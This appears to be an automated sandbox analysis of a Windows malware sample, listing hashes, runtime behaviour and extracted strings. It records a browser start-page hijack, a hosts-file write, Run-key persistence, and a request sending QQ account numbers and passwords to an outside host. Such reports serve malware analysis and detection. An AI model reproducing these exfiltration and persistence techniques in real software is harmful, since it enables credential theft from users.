Analysis Date: 2014-09-02 16:15:31
MD5: 560eb9a62cf6e209623307b0cfe938a6
SHA1: ccc2c835919230c25941050cc27056b1d135ef2e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text, md5: cc46aca97b4f5ff2f8afaafd53d5def4, sha1: 391513fff17764b5760011f63df0ea323bb64624, size: 229376
Section: .rdata, md5: 9e34367d76837123ad0447a1f5800858, sha1: 6f5365ba1f324f138ed11252bb487a0f9865217e, size: 24576
Section: .data, md5: cc6ce3fb30ce9ddc79f8c80c813d2d1c, sha1: 40ad6cff62ac548d647b61307f53250093560ff8, size: 249856
Timestamp: 2014-08-10 14:47:55
Packer: Microsoft Visual C++ v6.0
PEhash: 751d5a019bd71d4691f005b8c43645272b5a8fda
IMPhash: 0b8c36b70225ec8c60b2183de4929287

Runtime Details:

Process:
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝ http://www.duba.com/?un_2_445816\\x00
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue ➝ NULL
Creates File: C:\WINDOWS\system32\drivers\etc\hosts
Creates File: C:\Documents and Settings\Administrator\Desktop\CF\\xc3\\x8b\\xc2\\xa2\\xc3\\x87\\xc2\\xb9\\xc3\\x8f\\xc2\\xb5\\xc3\\x8d\\xc2\\xb3.lnk
Winsock URL: http://www.114lax.com/xin3/mail.asp?qqnumber=&qqpassword= 6

Network Details:


Raw Pcap

Strings
- not enough space for thread data
November
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PeekMessageA
Ph_^][Y
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
ppxxxx
PreviewPages
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PVh`XA
PWVWWW
  QQIE
&qqpassword=  
  QQPC
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
`.rdata
ReadProcessMemory
RectVisible
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
RemoveDirectoryA
RemoveMenu
RemovePropA
RestoreDC
__restrict
Rich2{
RichEdit Text and Objects
Rich Text Format
RPWWWj
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
:"%s".
Safe=0
Saturday
SaveDC
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetClassLongA
SetCursor
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
[ShdXA
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SING error
sO;>|C;~
software
Software\Microsoft\Internet Explorer\Main
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
StartAuto=1
Start Page
__stdcall
StretchBlt
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
t0WWWWW
t@_^]3
t8j\hp
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tBSh<ZC
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
t,h\NA
t=hpNA
t>Ht Ht
t+Ht$Ht
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
`udt returning'
uf9=,7I
u@h=$A
u-hq$A
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown exception
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
?UUUUUU
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
^VhdXA
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualQueryEx
v	N+D$
,&[vrH
VWh63A
VWh=$A
VWuBhL
WaitForSingleObject
Wednesday
w]h=$A
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
WPh8YA
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
"WWSh`XA
xppwpp
xpxxxx
>=Yt/j
_^][YY
\yyfm0529
YYu-9D$
YYuTVWh
yyyy-MM-dd
Z9K|uU
ZwQueryInformationProcess